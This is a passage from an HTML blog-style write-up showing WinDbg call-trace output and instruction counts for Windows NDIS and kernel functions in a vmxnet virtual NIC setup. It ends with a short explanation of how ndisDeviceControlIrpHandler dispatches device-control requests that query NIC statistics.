NDIS!ndisMDoRequests</span><br 
style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier 
New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 16 0 [ 8] NDIS!ndisMDispatchRequest</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 8] NDIS!ndisMDispatchRequest</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 8] NDIS!ndisMDispatchRequest</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 8] NDIS!ndisMDispatchRequest</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 8] NDIS!ndisMDispatchRequest</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 13 0 [ 8] NDIS!ndisMDispatchRequest</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 9] nt!KefReleaseSpinLockFromDpcLevel</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 3 0 [ 9] NDIS!ndisMDispatchRequest</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 9] NDIS!ndisMDispatchRequest</span><br 
style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 9] NDIS!ndisMDispatchRequest</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 9] NDIS!ndisMDispatchRequest</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 9] NDIS!ndisMDispatchRequest</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 9] NDIS!ndisMDispatchRequest</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 9] NDIS!ndisMDispatchRequest</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 9] NDIS!ndisMDispatchRequest</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 9] NDIS!ndisMDispatchRequest</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 9] NDIS!ndisMDispatchRequest</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 9] NDIS!ndisMDispatchRequest</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 9] NDIS!ndisMDispatchRequest</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span 
style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 9] NDIS!ndisMDispatchRequest</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">*** ERROR: Module load completed but symbols could not be loaded for vmxnet.sys</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> <b>1 0 [ 10] vmxnet</b></span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" 
/><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 
10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier 
New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier 
New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 11] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 30 0 [ 11] nt!memcpy</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ...</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ...</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ...</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">19154 instructions were executed in 1347 events (0 from other threads)</span><br style="color: 
yellow; font-family: "Courier New",Courier,monospace;" /><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">Function Name Invocations MinInst MaxInst AvgInst</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">NDIS!__security_check_cookie 2 5 5 5</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">NDIS!_alldiv 1 1 1 1</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">NDIS!_allmul 1 1 1 1</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">NDIS!ndisDereferencePackage 8 9 9 9</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">NDIS!ndisDeviceControlIrpHandler 1 158 158 158</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">NDIS!ndisMDispatchRequest 152 1 17 3</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">NDIS!ndisMDoRequests 272 1 24 2</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">NDIS!ndisMQueueRequest 8 9 9 9</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">NDIS!ndisMSyncQueryInformationComplete 96 1 27 4</span><br style="color: 
yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">NDIS!ndisQueryDeviceOid 8 22 22 22</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">NDIS!ndisQuerySetMiniport 8 92 92 92</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">NDIS!ndisQueryStatisticsOids 71 1 660 23</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">NDIS!ndisReferencePackage 8 10 10 10</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">NDIS!ndisValidOid 9 3 190 131</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">hal!KeAcquireInStackQueuedSpinLockRaiseToSynch 1 6 6 6</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">hal!KeRaiseIrqlToDpcLevel 35 5 5 5</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">hal!KfAcquireSpinLock 8 5 5 5</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">hal!KfRaiseIrql 9 7 7 7</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">hal!READ_PORT_ULONG 1 3 3 3</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; 
font-family: "Courier New",Courier,monospace;">nt!ExAcquireResourceExclusiveLite 8 23 23 23</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!ExAllocatePoolWithQuotaTag 1 59 59 59</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!ExAllocatePoolWithTag 3 73 173 106</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!ExFreePoolWithTag 2 82 130 106</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!ExInsertTailNBQueue1 70 70 70</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!ExInterlockedAddLargeStatistic 1 3 3 3</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!ExInterlockedPopEntrySList 6 3 3 3</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!ExMapHandleToPointerEx 1 36 36 36</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!ExReleaseResourceLite 8 31 31 31</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!ExRemoveHeadNBQueue1 56 56 56</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier 
New",Courier,monospace;">nt!ExUnlockHandleTableEntry 1 22 22 22</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!ExfInterlockedCompareExchange64 3 12 12 12</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!ExpInterlockedPopEntrySListEnd 6 5 5 5</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!ExpInterlockedPopEntrySListFault 6 1 1 1</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!ExpInterlockedPopEntrySListResume 6 5 5 5</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!ExpLookupHandleTableEntry 1 29 29 29</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!InterlockedPushEntrySList 2 13 13 13</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!IoAllocateIrp 1 5 5 5</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!IoAllocateMdl 1 55 55 55</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!IoGetRelatedDeviceObject 1 23 23 23</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!IofCallDriver 1 1 1 
1</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!IofCompleteRequest 1 1 1 1</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!IopAllocateIrpPrivate 1 208 208 208</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!IopGetMountFlag 1 11 11 11</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!IopSynchronousServiceTail 1 57 57 57</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!IopUpdateOtherOperationCount 1 9 9 9</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!IopXxxControlFile 1 235 235 235</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!IopfCallDriver 1 16 16 16</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!IopfCompleteRequest1 106 106 106</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!KeInitializeApc 1 26 26 26</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!KeInitializeEvent 8 14 14 14</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span 
style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!KeInsertQueueApc 1 31 31 31</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!KeQueryTimeIncrement 1 2 2 2</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!KeSetEvent 8 27 27 27</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!KeWaitForSingleObject 8 66 66 66</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!KefAcquireSpinLockAtDpcLevel 8 1 1 1</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!KefReleaseSpinLockFromDpcLevel 8 1 1 1</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!KiAdjustQuantumThread 8 18 42 27</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!KiFindReadyThread 3 43 49 47</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!KiInsertQueueApc 1 51 51 51</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!MiLockCode 8 496 496 496</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!MiReleaseSystemPtes1 57 57 
57</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!MiReserveSystemPtes1 44 44 44</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!MmLockPagableSectionByHandle 8 73 73 73</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!MmMapLockedPagesSpecifyCache 1 123 123 123</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!MmProbeAndLockPages1 200 200 200</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!MmUnlockPagableImageSection 8 368 368 368</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!MmUnlockPages 1 88 88 88</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!MmUnmapLockedPages 1 34 34 34</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!ObReferenceObjectByHandle 1 83 83 83</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!ObfDereferenceObject 1 26 26 26</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!ObfReferenceObject 2 14 14 14</span><br style="color: yellow; font-family: "Courier 
New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!PsChargeProcessPoolQuota 1 63 63 63</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!PsGetCurrentThread24 2 2 2</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!RtlFillMemoryUlonglong 1 15 15 15</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!_SEH_epilog 3 9 9 9</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!_SEH_prolog 3 19 19 19</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!_alldiv 1 27 27 27</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!_allmul 1 8 8 8</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!memcpy 8 30 32 31</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">nt!memmove 15 32 34 32</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">vmxnet 584 1 2 1 </span></span></blockquote></blockquote><ol start="2"><li>NdisDeviceControlIrpHandler</li>
<ul><li>We get three pieces of information here:</li>
<ol type="i"><li>NIC driver name: <b>vmxnet</b></li>
<li><b>NDIS!ndisQueryStatisticsOids</b> is used to query the NIC statistics</li>
<li><b>NDIS!ndisDeviceControlIrpHandler</b> is the dispatch handler for the <b>IRP_MJ_DEVICE_CONTROL</b> major function, which is responsible for handling <b>DeviceIoControl</b> calls from user mode</li>
<ul><li><b>ndisDeviceControlIrpHandler</b> is registered by ndis.sys through one of its exported functions, <b>NdisMRegisterMiniport</b></li>
</ul></ol></ul></ol><div style="text-align: center;"><span style="color: #e06666;">export function <b>NdisMRegisterMiniport </b></span>-> <b><span style="color: #e06666;">NdisRegisterMiniportDriver</span> </b>-> <span style="color: #e06666;">Dispatch routine <b>NdisDeviceControlIrpHandler </b></span>-> <b><span style="color: #e06666;">NdisQueryStatisticsOids </span></b><span style="color: lime;">// It's called <b>NdisDeviceControlIrpHandler</b> in Windows XP ndis.sys </span></div><div style="text-align: center;"><br />
</div><div style="text-align: center;"><u>Diagram Illustration of how NdisDeviceControlIrpHandler is called</u></div><ul><ul><li>To verify that:</li>
</ul></ul><blockquote><blockquote><i>Case (i):</i> <br />
<br />
